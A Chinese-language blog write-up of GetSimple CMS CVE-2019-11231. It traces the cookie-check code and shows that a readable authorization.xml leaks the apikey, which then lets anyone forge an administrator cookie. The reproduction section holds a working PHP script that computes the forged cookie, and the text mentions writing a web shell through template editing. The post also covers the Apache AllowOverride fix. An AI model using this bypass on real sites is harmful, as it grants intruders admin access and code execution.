前言

刷刷https://sec.today/,看到GetSimple CMS RCE(CVE-2019-11231)漏洞的分析。看了下,总结为apache默认未开启allowoverride,导致apikey泄露,可伪造管理员登录进后台为所欲为

分析

说到伪造管理员登录,首先去看看登录时候的代码

1
2
3
4
5
6
# admin/inc/login_functions.php

# if the login cookie is already set, redirect user to control panel
if(cookie_check()) {
	redirect($cookie_redirect);                                             
}

跟进cookie_check()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
# admin/inc/cookie_functions.php
function cookie_check() {
	global $USR,$SALT,$cookie_name;
	$saltUSR = $USR.$SALT;
	$saltCOOKIE = sha1($cookie_name.$SALT);
	if(isset($_COOKIE[$saltCOOKIE])&&$_COOKIE[$saltCOOKIE]==sha1($saltUSR)) {
		return TRUE; // Cookie proves logged in status.
	} else { 
		return FALSE; 
	}
}

$_COOKIE[$saltCOOKIE]==sha1($USR.$SALT)就能判断已经登录过了,那么问题来了,$USR$SALT是什么? 从create_cookie()中,可以猜测$USR为管理员的用户名

1
2
3
4
5
6
7
8
function create_cookie() {
  global $USR,$SALT,$cookie_time,$cookie_name;
  $saltUSR    = sha1($USR.$SALT);
  $saltCOOKIE = sha1($cookie_name.$SALT);

  gs_setcookie('GS_ADMIN_USERNAME', $USR);   
  gs_setcookie($saltCOOKIE, $saltUSR);
}

通过全局搜索$SALT,可以得到,$SALT就是apikey

1
2
3
4
5
6
7
8
if (file_exists(GSDATAOTHERPATH .'authorization.xml')) {
		$dataa = getXML(GSDATAOTHERPATH .'authorization.xml');
		$SALT = stripslashes($dataa->apikey);
	} else {
		if($SITEURL !='' && get_filename_id() != 'install' && get_filename_id() != 'setup' && get_filename_id() != 'update' && get_filename_id() != 'style'){
			die(i18n_r('KILL_CANT_CONTINUE')."<br/>".i18n_r('MISSING_FILE').": "."authorization.xml");
		}
	}

这样局面就十分明朗了,当然利用的前提是事先知道管理员的用户名,哦,还有个条件忘记提了,$cookie_name是可以知道的

1
2
3
4
5
6
7
8
$site_full_name     = 'GetSimple';
$site_version_no    = '3.3.15';
$name_url_clean     = lowercase(str_replace(' ','-',$site_full_name));
$ver_no_clean       = str_replace('.','',$site_version_no);
$site_link_back_url = 'http://get-simple.info/';

// cookie config
$cookie_name        = lowercase($name_url_clean) .'_cookie_'. $ver_no_clean; // non-hashed name of cookie

复现

首先访问/data/other/authorization.xml,获取apikey image.png 然后计算出$saltUSR$saltCOOKIE

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
        //Enter your code here, enjoy!

function create_cookie($USR, $SALT, $cookie_name) {
    $saltUSR    = sha1($USR.$SALT);
    $saltCOOKIE = sha1($cookie_name.$SALT);
    return array($saltUSR, $saltCOOKIE);
}

function lowercase($text) {
	if (function_exists('mb_strtolower')) {
		$text = mb_strtolower($text, 'UTF-8'); 
	} else {
		$text = strtolower($text); 
	}
	
	return $text;
}

$site_full_name     = 'GetSimple';
$site_version_no    = '3.3.15';
$name_url_clean     = lowercase(str_replace(' ','-',$site_full_name));
$ver_no_clean       = str_replace('.','',$site_version_no);
$site_link_back_url = 'http://get-simple.info/';

$cookie_name        = lowercase($name_url_clean) .'_cookie_'. $ver_no_clean;

$SALT = "57b2e4d934aed02bdf44b951e6a175c5";
$USR = "admin";
print("saltUSR:".create_cookie($USR, $SALT, $cookie_name)[0]."\n");
print("saltCOOKIE:".create_cookie($USR, $SALT, $cookie_name)[1]."\n");

然后添加cookie image.png 刷新就进后台了,就可以为所欲为了,修改模板写shell什么的都是常规操作了 image.png image.png

思考

漏洞的起因是apache默认没有开启,开启了会是怎样的?

power on !!! image.png 修改/etc/apache2/sites-enabled/000-default.conf image.png 重启apache后,访问 image.png 白等了

参考文章

https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution